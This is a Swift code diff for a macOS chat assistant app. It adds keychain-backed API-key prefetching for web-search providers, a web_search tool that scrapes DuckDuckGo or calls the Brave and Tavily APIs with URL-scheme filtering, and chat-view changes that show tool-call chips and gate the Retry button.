+        case .brave, .tavily: return apiKey(for: provider) != nil
+        }
+    }
+
+    // MARK: - Async prefetch (cycle-12 P3: Settings → Web Search blocked
+    // the UI on tab construction because the panel's view-builder asked
+    // ``apiKey(for:)`` for both Brave and Tavily — each call synchronously
+    // crosses the securityd XPC hop, and the first cross-process Keychain
+    // access against a ``kSecAttrAccessibleWhenUnlockedThisDeviceOnly``
+    // item can surface a system permission modal. The UI now warms the
+    // cache off the main actor before reading the cache; these two
+    // helpers are the seam.
+    //
+    // The pre-existing positive/negative cache contracts in
+    // ``WebSearchKeyCacheTests`` are preserved verbatim: ``apiKey(for:)``
+    // still does its own one-shot read + probe-bookkeeping, and a
+    // ``setAPIKey`` write still primes the cache directly. The new
+    // surface only adds an explicit "warm in the background" path plus
+    // a read-only cache peek that never hits Keychain.
+    //
+    // We deliberately do NOT add the prefetch to ``init`` — wiring it
+    // into the @State initializer would re-introduce a synchronous
+    // Keychain read on the first construction of ``WebSearchConfig``,
+    // which happens on the main actor during ``RapidApp`` boot. The
+    // caller decides when to warm.
+
+    /// Cache-only read. Returns ``.unknown`` when this provider has
+    /// not been probed yet, ``.present(value)`` when the cache holds
+    /// a non-empty key, and ``.absent`` when the cache has been told
+    /// there is no key (either because a write cleared it or because
+    /// a prior ``apiKey(for:)`` / ``prefetchAPIKey`` call resolved to
+    /// nil).
+    ///
+    /// Never touches Keychain. Safe to call from any tight render loop.
+    func cachedKeyState(for provider: WebSearchProvider) -> CachedKeyState {
+        guard let account = provider.keychainAccount else { return .absent }
+        guard probedAccounts.contains(account) else { return .unknown }
+        if let trimmed = keyCache[account]?
+            .trimmingCharacters(in: .whitespacesAndNewlines).nonEmpty {
+            return .present(trimmed)
+        }
+        return .absent
+    }
+
+    /// Warm ``cachedKeyState(for:)`` for ``provider`` without blocking
+    /// the calling actor on the Keychain XPC hop. Returns after the
+    /// cache + probed set have been populated. Safe to call repeatedly;
+    /// a probed provider short-circuits without re-reading Keychain.
+    ///
+    /// The Keychain read itself runs on a detached background task —
+    /// that's the whole reason this surface exists. The final cache
+    /// mutation hops back onto the main actor so the @Observable
+    /// machinery doesn't fire from off-actor and so callers that gate
+    /// UI on ``cachedKeyState`` see a coherent snapshot.
+    ///
+    /// **Cancellation contract** (codex r1 MAJOR). The detached read
+    /// itself cannot be interrupted — ``SecItemCopyMatching`` is a
+    /// blocking call across securityd XPC and the kernel gives us no
+    /// signal to abort it short of killing the process. What we CAN
+    /// guarantee is that the result is discarded if the caller's
+    /// ``Task`` was cancelled before we mutate ``keyCache``, so a
+    /// Web-Search-tab-flick-then-leave never lands a stale read in the
+    /// @Observable config (which would in turn flip the UI on a panel
+    /// the user has already navigated away from). We also honour an
+    /// authoritative concurrent write by re-checking
+    /// ``probedAccounts`` after the read returns — race with
+    /// ``setAPIKey`` / ``apiKey(for:)`` resolves in favour of the
+    /// in-line path because it's the one the user explicitly drove.
+    func prefetchAPIKey(for provider: WebSearchProvider) async {
+        guard let account = provider.keychainAccount else { return }
+        if probedAccounts.contains(account) { return }
+        // Honour cancellation BEFORE we cross XPC. If the .task is
+        // already cancelled (because the view disappeared between the
+        // caller scheduling us and getting here) skip the read
+        // entirely.
+        if Task.isCancelled { return }
+        // Snapshot the keychain handle off-actor: ``KeychainStoring`` is
+        // ``Sendable`` so this is safe; capturing ``self`` into the
+        // detached task would force ``WebSearchConfig`` to be Sendable,
+        // which it isn't (it's main-actor isolated for the @Observable
+        // reasons above).
+        let keychain = self.keychain
+        let value = await Task.detached(priority: .userInitiated) {
+            keychain.read(account: account)
+        }.value
+        // codex r1 MAJOR: discard the result if our parent task was
+        // cancelled while we were waiting on the detached read — the
+        // view that triggered us is gone and we must not mutate the
+        // @Observable cache (would push an out-of-band UI refresh on
+        // whatever screen the user navigated to).
+        if Task.isCancelled { return }
+        // Re-check probed: another caller may have raced us through
+        // ``apiKey(for:)`` / ``setAPIKey`` while we were waiting on the
+        // detached read. If so, drop our snapshot — the in-line
+        // read / write is authoritative (the write path also primes
+        // the cache directly).
+        if probedAccounts.contains(account) { return }
+        if let value, !value.isEmpty {
+            keyCache[account] = value
+        }
+        probedAccounts.insert(account)
+    }
+
+    /// Convenience: warm every keyed provider in parallel. Used by the
+    /// Settings → Web Search panel's ``.task`` so the cache is populated
+    /// once, off the main actor, before the panel re-renders.
+    func prefetchAllAPIKeys() async {
+        await withTaskGroup(of: Void.self) { group in
+            for provider in WebSearchProvider.allCases where provider.requiresKey {
+                group.addTask { await self.prefetchAPIKey(for: provider) }
+            }
+        }
+    }
+}
+
+/// Result of ``WebSearchConfig.cachedKeyState(for:)``. ``.unknown``
+/// is the load-bearing case: it tells the UI "we have NOT probed
+/// the Keychain for this account yet, render a neutral placeholder
+/// — do not assume absent, and do not block on a fresh read."
+enum CachedKeyState: Equatable, Sendable {
+    case unknown
+    case absent
+    case present(String)
+
+    var hasKey: Bool {
+        if case .present = self { return true }
+        return false
+    }
+}
+
+private extension String {
+    /// Returns nil for empty / whitespace-only strings. Keeps the
+    /// ``apiKey(for:)`` call site free of "is this string actually
+    /// present?" boilerplate.
+    var nonEmpty: String? {
+        let trimmed = self.trimmingCharacters(in: .whitespacesAndNewlines)
+        return trimmed.isEmpty ? nil : trimmed
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/WebSearchTool.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/WebSearchTool.swift
@@ -1,0 +1,456 @@
+import Foundation
+
+/// Cheap web search via DuckDuckGo's HTML-only endpoint. No API key,
+/// no JS engine — we just GET the HTML page and pull the visible
+/// result links + snippets with regex. Brittle by design but the
+/// alternative (Google CSE / Bing API / SerpAPI) all require paid
+/// keys and an account, which Rapid's privacy-first stance doesn't
+/// want to ship with.
+///
+/// Returns the top N results as a plain-text bulleted list the
+/// model can quote from. No raw HTML, no link tracking — just
+/// title + URL + snippet per result.
+enum WebSearchTool {
+    static let definition = ToolDefinition(
+        name: "web_search",
+        description: "Search the web and get the top results (title + URL + snippet). Use this when the user asks about current events, recent news, or facts that might have changed since the model was trained.",
+        parameters: .object([
+            "type": .string("object"),
+            "properties": .object([
+                "query": .object([
+                    "type": .string("string"),
+                    "description": .string("Search query in natural language.")
+                ])
+            ]),
+            "required": .array([.string("query")])
+        ])
+    )
+
+    static let resultCap: Int = 6
+    static let snippetCharCap: Int = 240
+    static let totalOutputCharCap: Int = 4096
+
+    struct Args: Decodable {
+        let query: String
+    }
+
+    /// Compatibility shim — the legacy single-arg form runs against
+    /// DuckDuckGo. Used by tests and any caller that hasn't
+    /// migrated to the provider-aware overload yet.
+    static func run(arguments: String) async -> ToolCallResult {
+        await run(arguments: arguments, provider: .duckduckgo, apiKey: nil)
+    }
+
+    /// v0.4.41 provider-aware entry point. Dispatches on the
+    /// configured ``WebSearchProvider``:
+    ///
+    ///   * ``.duckduckgo`` — HTML scrape, no key
+    ///   * ``.brave`` — JSON API, ``X-Subscription-Token`` header
+    ///   * ``.tavily`` — JSON API, key in body
+    ///
+    /// When a paid provider is configured but the user hasn't
+    /// pasted a key yet, we silently fall back to DuckDuckGo with
+    /// a one-line hint appended to the model-visible result so the
+    /// assistant can tell the user what's going on (and so the
+    /// fallback isn't completely invisible). This matches the
+    /// "no broken state" promise the rest of the app makes — the
+    /// search keeps working even if the API key slot is empty.
+    static func run(
+        arguments: String,
+        provider: WebSearchProvider,
+        apiKey: String?
+    ) async -> ToolCallResult {
+        let toolName = "web_search"
+        guard let data = arguments.data(using: .utf8),
+              let args = try? JSONDecoder().decode(Args.self, from: data) else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: could not parse arguments JSON", isError: true)
+        }
+        let q = args.query.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard !q.isEmpty else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: empty query", isError: true)
+        }
+        var effectiveProvider = provider
+        var fallbackNote: String? = nil
+        if provider.requiresKey, apiKey == nil {
+            effectiveProvider = .duckduckgo
+            fallbackNote = "Note: \(provider.displayName) is selected but no API key is set — falling back to DuckDuckGo. Open Settings → Tools → Web search to paste a key."
+        }
+        switch effectiveProvider {
+        case .duckduckgo:
+            return await runDuckDuckGo(query: q, fallbackNote: fallbackNote)
+        case .brave:
+            return await runBrave(query: q, apiKey: apiKey ?? "")
+        case .tavily:
+            return await runTavily(query: q, apiKey: apiKey ?? "")
+        }
+    }
+
+    /// Shared formatting: takes a list of provider-agnostic
+    /// ``Result`` rows and renders the model-visible bulleted
+    /// payload. Lifted out so every backend produces an
+    /// identical wire shape, which keeps the tool description
+    /// honest regardless of which provider answered.
+    static func formatOutput(
+        query: String,
+        provider: WebSearchProvider,
+        results: [Result],
+        fallbackNote: String? = nil
+    ) -> ToolCallResult {
+        if results.isEmpty {
+            var content = "web_search: no results found for \"\(query)\""
+            if let note = fallbackNote { content += "\n\n" + note }
+            return ToolCallResult(toolCallID: "", content: content, isError: false)
+        }
+        let bullets = results.enumerated().map { i, r -> String in
+            let t = r.title.isEmpty ? r.url : r.title
+            var snippet = r.snippet
+            if snippet.count > snippetCharCap {
+                snippet = String(snippet.prefix(snippetCharCap)) + "…"
+            }
+            return "\(i + 1). \(t)\n   \(r.url)\n   \(snippet)"
+        }
+        var content = "Web search via \(provider.displayName): \"\(query)\" — \(results.count) results\n\n" + bullets.joined(separator: "\n\n")
+        if let note = fallbackNote {
+            content += "\n\n" + note
+        }
+        if content.count > totalOutputCharCap {
+            content = String(content.prefix(totalOutputCharCap)) + "\n…(truncated)"
+        }
+        return ToolCallResult(toolCallID: "", content: content, isError: false)
+    }
+
+    // MARK: - Per-provider runners
+
+    static func runDuckDuckGo(query q: String, fallbackNote: String?) async -> ToolCallResult {
+        let toolName = "web_search"
+        // DDG's HTML endpoint expects ``q=`` URL-encoded.
+        guard let encoded = q.addingPercentEncoding(withAllowedCharacters: .urlQueryAllowed),
+              let url = URL(string: "https://html.duckduckgo.com/html/?q=\(encoded)") else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: could not build search URL", isError: true)
+        }
+        var req = URLRequest(url: url)
+        // Without a UA header DDG redirects to a landing page; the
+        // Safari UA is innocuous and stable.
+        req.setValue("Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15", forHTTPHeaderField: "User-Agent")
+        req.timeoutInterval = 15
+        do {
+            let (data, response) = try await cappedData(for: req)
+            guard let http = response as? HTTPURLResponse, (200..<300).contains(http.statusCode) else {
+                let code = (response as? HTTPURLResponse)?.statusCode ?? -1
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: DuckDuckGo returned HTTP \(code)", isError: true)
+            }
+            guard let html = String(data: data, encoding: .utf8) else {
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: non-UTF8 response", isError: true)
+            }
+            // DDG silently rate-limits repeat callers from a single
+            // IP/UA: the HTTP response is still 200 but the body is
+            // the "Unfortunately, bots use DuckDuckGo too." modal
+            // instead of result blocks. Without an explicit check
+            // ``parseDDGHTML`` returns an empty list and the model
+            // hears "no results found" — indistinguishable from a
+            // query that genuinely matched nothing. Surface the
+            // block so the assistant can either back off or tell
+            // the user to configure a paid backend.
+            if detectDDGAntiBot(html) {
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName) error: DuckDuckGo blocked this request (anti-bot rate limit). Either wait a few minutes, or configure a paid backend in Settings → Tools → Web search (Brave: 2000 queries/month free; Tavily: 1000 queries/month free).",
+                    isError: true
+                )
+            }
+            let results = parseDDGHTML(html, cap: resultCap)
+            return formatOutput(query: q, provider: .duckduckgo, results: results, fallbackNote: fallbackNote)
+        } catch {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: \(error.localizedDescription)", isError: true)
+        }
+    }
+
+    static func runBrave(query q: String, apiKey: String) async -> ToolCallResult {
+        let toolName = "web_search"
+        guard let req = BraveSearchClient.buildRequest(query: q, apiKey: apiKey, count: resultCap) else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: could not build Brave request", isError: true)
+        }
+        do {
+            let (data, response) = try await cappedData(for: req)
+            guard let http = response as? HTTPURLResponse else {
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: Brave returned no HTTP response", isError: true)
+            }
+            switch http.statusCode {
+            case 200..<300:
+                let results = BraveSearchClient.parseResults(data, cap: resultCap)
+                return formatOutput(query: q, provider: .brave, results: results)
+            case 401, 403:
+                // Account-level error — surface clearly so the
+                // user knows to revisit their key.
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName) error: Brave rejected the API key (HTTP \(http.statusCode)). Re-paste it in Settings → Tools → Web search.",
+                    isError: true
+                )
+            case 429:
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName) error: Brave free-tier limit hit (HTTP 429). Wait a few minutes or upgrade your plan.",
+                    isError: true
+                )
+            default:
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: Brave returned HTTP \(http.statusCode)", isError: true)
+            }
+        } catch {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: \(error.localizedDescription)", isError: true)
+        }
+    }
+
+    static func runTavily(query q: String, apiKey: String) async -> ToolCallResult {
+        let toolName = "web_search"
+        guard let req = TavilySearchClient.buildRequest(query: q, apiKey: apiKey, maxResults: resultCap) else {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: could not build Tavily request", isError: true)
+        }
+        do {
+            let (data, response) = try await cappedData(for: req)
+            guard let http = response as? HTTPURLResponse else {
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: Tavily returned no HTTP response", isError: true)
+            }
+            switch http.statusCode {
+            case 200..<300:
+                let results = TavilySearchClient.parseResults(data, cap: resultCap)
+                return formatOutput(query: q, provider: .tavily, results: results)
+            case 401, 403:
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName) error: Tavily rejected the API key (HTTP \(http.statusCode)). Re-paste it in Settings → Tools → Web search.",
+                    isError: true
+                )
+            case 429:
+                return ToolCallResult(
+                    toolCallID: "",
+                    content: "\(toolName) error: Tavily free-tier limit hit (HTTP 429). Wait a few minutes or upgrade your plan.",
+                    isError: true
+                )
+            default:
+                return ToolCallResult(toolCallID: "", content: "\(toolName) error: Tavily returned HTTP \(http.statusCode)", isError: true)
+            }
+        } catch {
+            return ToolCallResult(toolCallID: "", content: "\(toolName) error: \(error.localizedDescription)", isError: true)
+        }
+    }
+
+    struct Result: Equatable, Sendable {
+        let title: String
+        let url: String
+        let snippet: String
+    }
+
+    /// True when ``html`` is DuckDuckGo's anti-bot challenge page
+    /// rather than a real results page. DDG returns these with a
+    /// normal HTTP 200, so without this check the empty result list
+    /// is indistinguishable from a query that genuinely matched
+    /// nothing.
+    ///
+    /// Detection uses a two-step gate to avoid false-positives on
+    /// queries that *describe* the bot-challenge UI (e.g. a search
+    /// for ``"anomaly-modal class"`` or ``"ddg cc=botnet"``):
+    ///
+    /// 1. **No ``result__body`` *as a class token*** — every real
+    ///    results page ships at least one ``<div>`` whose class
+    ///    list contains ``result__body``. The challenge page ships
+    ///    zero. The check anchors on ``class="`` so that an echoed
+    ///    query containing the literal text ``result__body`` (which
+    ///    DDG copies back into a form ``value=""`` attribute on the
+    ///    challenge page) does not satisfy the guard. Codex round-2
+    ///    P3 called this out: a bare substring check would let an
+    ///    adversarial query bypass detection and revert to "no
+    ///    results found" UX.
+    /// 2. **A challenge marker is present** — either
+    ///    ``anomaly-modal`` (the BEM class root the challenge modal
+    ///    uses on its container, title, and form children,
+    ///    ``anomaly-modal__title`` etc.) or ``cc=botnet`` (the
+    ///    classification token DDG embeds in the challenge form's
+    ///    action URL). Bare-token matching survives the same kind
+    ///    of class-chain reordering that broke the ``result__body``
+    ///    parser on 2026-06-09; ``cc=botnet`` is kept as a fallback
+    ///    in case the modal class is renamed but the wire-level
+    ///    classification stays put.
+    ///
+    /// Codex round-1 P2 (PR #184) called out the original
+    /// substring-only form misclassifying a legitimate results
+    /// page whose echoed query / title / snippet happened to
+    /// contain one of the marker strings. The class-attribute gate
+    /// closes that hole — real result pages always have at least
+    /// one block, so the detector cannot fire when the parser would
+    /// have found hits.
+    static func detectDDGAntiBot(_ html: String) -> Bool {
+        // Cheap structural guard: a real results page always ships
+        // result blocks whose class list contains ``result__body``.
+        // We require the token to appear inside a ``class="…"``
+        // attribute so that an echoed query value of the same
+        // string (codex r2 P3) doesn't satisfy the guard.
+        if containsResultBodyClassToken(html) { return false }
+        return html.contains("anomaly-modal") || html.contains("cc=botnet")
+    }
+
+    /// True when ``html`` contains a ``class="…"`` attribute whose
+    /// value list includes the ``result__body`` token. Used by
+    /// ``detectDDGAntiBot`` to tell a real results page (which has
+    /// the token in markup) from a challenge page that merely
+    /// echoes the user's query string back into a form input.
+    ///
+    /// Scans both single- and double-quoted class attributes since
+    /// DDG's HTML has historically mixed quoting on the same page.
+    /// The check is intentionally simple — DDG only writes the
+    /// class list in well-formed quoted attributes; if that ever
+    /// changes the existing ``parseDDGHTML`` regression suite will
+    /// fire first and we can revisit.
+    static func containsResultBodyClassToken(_ html: String) -> Bool {
+        let needle = "result__body"
+        let bytes = html
+        var idx = bytes.startIndex
+        while let r = bytes.range(of: needle, range: idx..<bytes.endIndex) {
+            // Look backward for the opening ``class=`` attribute on
+            // the same tag. ``<`` bounds the search so we don't
+            // pull in a class attribute from an earlier element.
+            let scanFrom = bytes.startIndex
+            let scope = bytes[scanFrom..<r.lowerBound]
+            if let openTag = scope.range(of: "<", options: .backwards),
+               let classAttr = scope.range(of: "class=", options: .backwards, range: openTag.upperBound..<scope.endIndex) {
+                // Ensure no closing ``>`` between the ``class=`` and
+                // our match — i.e. the token really sits inside the
+                // attribute value, not in a sibling.
+                let between = scope[classAttr.upperBound...]
+                if !between.contains(">") { return true }
+            }
+            idx = r.upperBound
+        }
+        return false
+    }
+
+    /// Best-effort parser for DuckDuckGo's HTML-only results page.
+    /// The endpoint serves one ``<div class="result">`` block per
+    /// hit; inside each block we find ``<a class="result__a"``
+    /// (title + link) and ``<a class="result__snippet"`` (snippet).
+    static func parseDDGHTML(_ html: String, cap: Int) -> [Result] {
+        // Split into per-result blocks. The HTML is permissive and
+        // server-rendered so this is robust enough for v0.3.
+        //
+        // ``result__body`` is the marker token DDG has used on the
+        // per-hit container ever since the HTML-only endpoint
+        // launched. The v0.3 build pinned the marker to the
+        // *prefix* form ``class="result__body`` because the class
+        // chain back then was ``class="result__body links_main"``.
+        // DDG has since reordered the chain to
+        // ``class="links_main links_deep result__body"`` (observed
+        // 2026-06-09), which made the prefix-anchored split match
+        // zero times and silently turned every search into "no
+        // results found." Anchoring on the bare token catches both
+        // orderings; the extractor below still scans backward for
+        // the enclosing ``<a>`` tag, so the block boundary itself
+        // only needs to land *inside* the result container.
+        let blockMarker = "result__body"
+        var blocks = html.components(separatedBy: blockMarker)
+        if blocks.count <= 1 { return [] }
+        blocks.removeFirst()  // pre-content header
+
+        var out: [Result] = []
+        for block in blocks {
+            if out.count >= cap { break }
+            let title = extractText(in: block, between: "class=\"result__a\"", and: "</a>")
+            let urlHref = extractAttr(in: block, attr: "href", after: "class=\"result__a\"")
+            let snippet = extractText(in: block, between: "class=\"result__snippet\"", and: "</a>")
+            // Codex round-2 finding: the previous form fell back to
+            // ``urlHref`` whenever ``ddgRedirectExtract`` returned
+            // nil — and ``ddgRedirectExtract`` returns nil for any
+            // ``uddg=`` value whose scheme is not http(s). The raw
+            // href could still be a ``javascript:``/``data:`` URL,
+            // which the model would happily surface and the user
+            // might click. Validate the final URL scheme before
+            // including the result.
+            let decoded = ddgRedirectExtract(urlHref) ?? urlHref
+            guard isSafeHttpURL(decoded) else { continue }
+            let cleanedTitle = stripTags(title).trimmingCharacters(in: .whitespacesAndNewlines)
+            let cleanedSnippet = stripTags(snippet).trimmingCharacters(in: .whitespacesAndNewlines)
+            guard !cleanedTitle.isEmpty || !decoded.isEmpty else { continue }
+            out.append(Result(title: cleanedTitle, url: decoded, snippet: cleanedSnippet))
+        }
+        return out
+    }
+
+    /// DDG wraps every result href as ``/l/?uddg=<url-encoded>``;
+    /// pull the wrapped URL out so the model sees the real domain.
+    ///
+    /// Returns ``nil`` for non-http(s) destinations. DDG's HTML
+    /// surface has historically been used to smuggle ``javascript:``
+    /// and ``data:`` URIs into result lists, and the model will
+    /// happily surface those for the user to click. Restricting to
+    /// http/https keeps the assistant from turning into a phishing
+    /// vector.
+    static func ddgRedirectExtract(_ raw: String) -> String? {
+        // Look for "uddg=" then take the rest until "&" or end.
+        guard let r = raw.range(of: "uddg=") else { return nil }
+        let after = raw[r.upperBound...]
+        let cut = after.firstIndex(of: "&") ?? after.endIndex
+        let encoded = String(after[..<cut])
+        let decoded = encoded.removingPercentEncoding ?? encoded
+        return isSafeHttpURL(decoded) ? decoded : nil
+    }
+
+    /// True only when ``raw`` parses as an http or https URL. Used
+    /// at both the wrapped-URL extraction site AND the post-fallback
+    /// gate so a raw ``javascript:``/``data:``/``file:`` href that
+    /// sneaks past one path is still rejected by the other.
+    static func isSafeHttpURL(_ raw: String) -> Bool {
+        guard let scheme = URLComponents(string: raw)?.scheme?.lowercased() else { return false }
+        return scheme == "http" || scheme == "https"
+    }
+
+    /// Pull the substring between ``start`` (passed past the
+    /// opening tag, e.g. ``class="..."``) and the next ``end``.
+    static func extractText(in block: String, between start: String, and end: String) -> String {
+        guard let s = block.range(of: start) else { return "" }
+        // Skip to the end of the opening tag.
+        guard let openClose = block[s.upperBound...].firstIndex(of: ">") else { return "" }
+        let textStart = block.index(after: openClose)
+        guard let e = block[textStart...].range(of: end) else { return "" }
+        return String(block[textStart..<e.lowerBound])
+    }
+
+    static func extractAttr(in block: String, attr: String, after marker: String) -> String {
+        guard let m = block.range(of: marker) else { return "" }
+        // Look back from the marker to find the enclosing ``<a ...>``
+        // tag's ``href=`` attribute.
+        let leading = block[..<m.upperBound]
+        guard let aTagStart = leading.range(of: "<a ", options: .backwards) else { return "" }
+        let scope = block[aTagStart.upperBound...]
+        // Within the tag, find the attribute.
+        let attrToken = "\(attr)=\""
+        guard let attrR = scope.range(of: attrToken) else { return "" }
+        let valueStart = attrR.upperBound
+        guard let q = scope[valueStart...].firstIndex(of: "\"") else { return "" }
+        return String(scope[valueStart..<q])
+    }
+
+    static func stripTags(_ html: String) -> String {
+        // Quick-and-dirty tag stripping; ``</b>`` and ``<b>`` come
+        // through on bolded query terms. We don't need a real parser.
+        var out = ""
+        var inside = false
+        for ch in html {
+            if ch == "<" { inside = true; continue }
+            if ch == ">" { inside = false; continue }
+            if !inside { out.append(ch) }
+        }
+        return decodeHTMLEntities(out)
+    }
+
+    static func decodeHTMLEntities(_ s: String) -> String {
+        // Just the half-dozen entities DDG actually emits — full HTML
+        // entity decoding is overkill for what's effectively title +
+        // snippet text.
+        s.replacingOccurrences(of: "&amp;", with: "&")
+            .replacingOccurrences(of: "&lt;", with: "<")
+            .replacingOccurrences(of: "&gt;", with: ">")
+            .replacingOccurrences(of: "&quot;", with: "\"")
+            .replacingOccurrences(of: "&#39;", with: "'")
+            .replacingOccurrences(of: "&apos;", with: "'")
+            .replacingOccurrences(of: "&nbsp;", with: " ")
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/UI/ChatView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ChatView.swift
@@ -321,7 +321,18 @@ struct ChatView: View {
                                 id: message.id,
                                 alias: alias
                             )
-                        }
+                        },
+                        // Retry re-enters ``send``, so it answers to the same
+                        // lifecycle gate — and must LOOK like it does. It used
+                        // to render at full weight in every state and then do
+                        // nothing at all when the model wasn't running: the
+                        // gate fired, the banner flashed 400pt away at the
+                        // bottom of the window, and the button the user
+                        // actually pressed gave no feedback whatsoever. It now
+                        // dims and carries the Send tooltip's sentence, which
+                        // is the pattern ``sendOrStopButton`` already uses.
+                        retryEnabled: readiness.sendAllowed,
+                        retryTooltip: readiness.sendTooltip
                     )
                     .frame(maxWidth: contentMaxWidth, alignment: .leading)
                     .frame(maxWidth: .infinity, alignment: .center)
@@ -644,6 +655,13 @@ private struct MessageRow: View {
     var toolResults: [String: ChatMessage] = [:]
     var onEdit: (String) -> Bool = { _ in false }
     var onRetry: () -> Bool = { false }
+    /// Whether Retry can actually start a turn right now. Mirrors the
+    /// composer's Send gate so a dead button is never shown at full
+    /// weight — see the call site in ``ChatView.transcriptRows``.
+    var retryEnabled: Bool = true
+    /// The one sentence explaining a disabled Retry. Same string the
+    /// Send button uses, so both channels say the same thing.
+    var retryTooltip: String = "Retry response"
 
     @State private var reasoningExpanded: Bool = false
     @State private var isEditing: Bool = false
@@ -833,7 +851,9 @@ private struct MessageRow: View {
                     .font(.caption)
                     .foregroundStyle(.tertiary)
             }
-            assistantActions
+            if showsAssistantActions {
+                assistantActions
+            }
         }
         .frame(maxWidth: .infinity, alignment: .leading)
     }
@@ -857,12 +877,36 @@ private struct MessageRow: View {
             QuietIconButton(
                 symbol: "arrow.clockwise",
                 label: "Retry response",
+                help: retryEnabled ? "Retry response" : retryTooltip,
                 size: RapidTheme.ControlHeight.mini
             ) {
                 _ = onRetry()
             }
-            .disabled(isStreaming)
+            .disabled(isStreaming || !retryEnabled)
+            .accessibilityHint(retryEnabled ? "" : retryTooltip)
         }
+    }
+
+    /// Whether this assistant row is a finished ANSWER the user can copy
+    /// or regenerate — as opposed to a mid-turn tool dispatch.
+    ///
+    /// A tool round-trip writes two assistant rows into the transcript:
+    /// the one that requested the tool (prose empty, ``toolCalls``
+    /// populated, and the chips rendered under it), then the one that
+    /// reads the results and actually answers. Rendering the action row
+    /// under BOTH put a stray copy/retry pair between the weather chip
+    /// and the sentence it produced — pointing at nothing the user
+    /// thinks of as a response, since the visible answer is the row
+    /// below. Copy would have yielded the empty string, and Retry would
+    /// have rewound the same user turn the second row's Retry already
+    /// covers.
+    ///
+    /// Keyed on the tool-dispatch shape rather than "is the last row" so
+    /// it holds for every round of a multi-round turn, and for a row
+    /// still streaming its follow-up prose.
+    private var showsAssistantActions: Bool {
+        guard let calls = message.toolCalls, !calls.isEmpty else { return true }
+        return !message.content.trimmingCharacters(in: .whitespacesAndNewlines).isEmpty
     }
 
     private var assistantCopyText: String {

--- a/apps/rapid-mac/Sources/Rapid/UI/ChatView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/ChatView.swift
@@ -283,22 +283,39 @@ struct ChatView: View {
     /// ``ScrollView`` content to zero height).
     @ViewBuilder
     var transcriptRows: some View {
+        // Tool results are rendered INSIDE the assistant row that dispatched
+        // them (as an expandable chip), never as standalone transcript rows —
+        // a raw JSON blob in the scroll reads as debug output.
+        let toolResults = ChatView.toolResultsByCallID(messages)
         LazyVStack(alignment: .leading, spacing: RapidTheme.Space.lg) {
             ForEach(messages) { message in
-                MessageRow(
-                    message: message,
-                    isStreaming: viewModel.isStreaming,
-                    onRegenerate: regenerate
-                )
-                .frame(maxWidth: contentMaxWidth, alignment: .leading)
-                .frame(maxWidth: .infinity, alignment: .center)
-                .id(message.id)
+                if message.role != .tool {
+                    MessageRow(
+                        message: message,
+                        isStreaming: viewModel.isStreaming,
+                        toolResults: toolResults,
+                        onRegenerate: regenerate
+                    )
+                    .frame(maxWidth: contentMaxWidth, alignment: .leading)
+                    .frame(maxWidth: .infinity, alignment: .center)
+                    .id(message.id)
+                }
             }
             Color.clear
                 .frame(height: 1)
         }
         .padding(.horizontal, RapidTheme.Space.xl)
         .padding(.vertical, RapidTheme.Space.xl)
+    }
+
+    /// Index every ``role: .tool`` row by the ``toolCallID`` it answers, so an
+    /// assistant row can pair each of its ``toolCalls`` with its result.
+    static func toolResultsByCallID(_ messages: [ChatMessage]) -> [String: ChatMessage] {
+        var out: [String: ChatMessage] = [:]
+        for m in messages where m.role == .tool {
+            if let id = m.toolCallID { out[id] = m }
+        }
+        return out
     }
 
     private var emptyState: some View {
@@ -546,6 +563,9 @@ struct ChatView: View {
 private struct MessageRow: View {
     let message: ChatMessage
     let isStreaming: Bool
+    /// Tool-result rows keyed by the ``ToolCall.id`` they answer. Used to
+    /// pair each dispatched call with its outcome inside this row.
+    var toolResults: [String: ChatMessage] = [:]
     var onRegenerate: () -> Void = {}
 
     @State private var reasoningExpanded: Bool = false
@@ -586,11 +606,35 @@ private struct MessageRow: View {
             if !message.reasoning.trimmingCharacters(in: .whitespacesAndNewlines).isEmpty {
                 reasoningDisclosure
             }
-            if !message.content.isEmpty {
+            if message.toolCallArtifactSuppressed {
+                // The model tried to call a tool and the parser couldn't read
+                // the request. Show the quiet explainer instead of dumping the
+                // raw envelope syntax at the user.
+                Text(ChatMessage.toolCallArtifactSuppressedCaptionCopy)
+                    .font(.footnote)
+                    .foregroundStyle(.secondary)
+            } else if !message.content.isEmpty {
                 LaTeXMarkdownView(content: message.content)
                     .textSelection(.enabled)
+            } else if let caption = toolDispatchCaption {
+                Text(caption)
+                    .font(.footnote)
+                    .foregroundStyle(.secondary)
             } else if showTypingIndicator {
                 typingIndicator
+            }
+            if let calls = message.toolCalls, !calls.isEmpty {
+                VStack(alignment: .leading, spacing: 6) {
+                    ForEach(calls) { call in
+                        ToolCallChip(call: call, result: toolResults[call.id])
+                    }
+                }
+            }
+            if message.toolNotCalledFlagged {
+                Text(ChatMessage.toolNotCalledCaptionCopy)
+                    .font(.footnote)
+                    .foregroundStyle(.secondary)
+                    .accessibilityLabel(ChatMessage.toolNotCalledCaptionAccessibilityLabel)
             }
             if message.status == .failed {
                 failureCaption
@@ -611,6 +655,19 @@ private struct MessageRow: View {
             }
         }
         .frame(maxWidth: .infinity, alignment: .leading)
+    }
+
+    /// "Calling web_search…" filler for the window between a tool_calls
+    /// envelope landing with no preamble prose and the result coming back.
